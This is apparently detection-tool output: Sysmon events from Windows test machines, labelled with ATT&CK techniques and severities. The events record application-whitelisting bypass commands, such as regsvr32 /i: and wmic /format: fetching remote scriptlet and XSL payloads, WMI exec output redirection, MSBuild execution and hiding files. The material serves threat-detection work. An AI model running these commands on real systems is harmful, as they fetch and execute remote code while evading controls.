<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:53.776441Z"">
</TimeCreated>
<EventRecordID>4939</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:53.759</Data>
<Data Name=""ProcessGuid"">747F3D96-6641-5D3F-0000-0010A38C8A00</Data>
<Data Name=""ProcessId"">4260</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:53.776441Z"">
</TimeCreated>
<EventRecordID>4939</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:53.759</Data>
<Data Name=""ProcessGuid"">747F3D96-6641-5D3F-0000-0010A38C8A00</Data>
<Data Name=""ProcessId"">4260</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1594332045.590448,2020-07-10T02:00:45.590448+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-09T22:00:45.589922Z"">
</TimeCreated>
<EventRecordID>311365</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3280"" ThreadID=""1044"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-09 22:00:45.576</Data>
<Data Name=""ProcessGuid"">747F3D96-938D-5F07-0000-001043A84500</Data>
<Data Name=""ProcessId"">7976</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-86FA-5F07-0000-00204A8B0600</Data>
<Data Name=""LogonId"">0x68b4a</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-86FC-5F07-0000-00101E4B0700</Data>
<Data Name=""ParentProcessId"">2356</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436029.889688,2019-07-30T01:33:49.889688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:49.748805Z"">
</TimeCreated>
<EventRecordID>4936</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:49.535</Data>
<Data Name=""ProcessGuid"">747F3D96-663D-5D3F-0000-00106F608A00</Data>
<Data Name=""ProcessId"">3240</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028513.920273,2019-03-20T00:48:33.920273+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:48:33.870201Z"">
</TimeCreated>
<EventRecordID>1966382</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:48:33.639</Data>
<Data Name=""ProcessGuid"">365ABB72-55A1-5C91-0000-0010D6960700</Data>
<Data Name=""ProcessId"">2368</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1158] Hidden Files and Directories,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\attrib.exe ) through command line ( attrib +h nbtscan.exe ) accessing hidden files and directories,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-19T17:32:00.482982Z"">
</TimeCreated>
<EventRecordID>22013</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1768"" ThreadID=""2272"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories</Data>
<Data Name=""UtcTime"">2019-05-19 17:32:00.478</Data>
<Data Name=""ProcessGuid"">DFAE8213-9310-5CE1-0000-0010EABA0A00</Data>
<Data Name=""ProcessId"">2728</Data>
<Data Name=""Image"">C:\Windows\System32\attrib.exe</Data>
<Data Name=""FileVersion"">6.3.9600.16384 (winblue_rtm.130821-1623)</Data>
<Data Name=""Description"">Attribute Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">attrib +h nbtscan.exe</Data>
<Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""LogonGuid"">DFAE8213-9133-5CE1-0000-0020CC660500</Data>
<Data Name=""LogonId"">0x566cc</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02</Data>
<Data Name=""ParentProcessGuid"">DFAE8213-91CC-5CE1-0000-0010BEF40600</Data>
<Data Name=""ParentProcessId"">3408</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436029.340889,2019-07-30T01:33:49.340889+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:46.095763Z"">
</TimeCreated>
<EventRecordID>4934</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.949</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
<Data Name=""ProcessId"">4288</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49829</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1564436026.095763,2019-07-30T01:33:46.095763+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( &quot;C:\Windows\System32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:45.581170Z"">
</TimeCreated>
<EventRecordID>4933</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:45.332</Data>
<Data Name=""ProcessGuid"">747F3D96-6639-5D3F-0000-001074F48900</Data>
<Data Name=""ProcessId"">208</Data>
<Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Calculator</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\calc.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
<Data Name=""ParentProcessId"">4288</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:44.641177Z"">
</TimeCreated>
<EventRecordID>4931</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.622</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
<Data Name=""ProcessId"">4288</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:44.641177Z"">
</TimeCreated>
<EventRecordID>4931</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.622</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
<Data Name=""ProcessId"">4288</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6638-5D3F-0000-00103DA88900</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
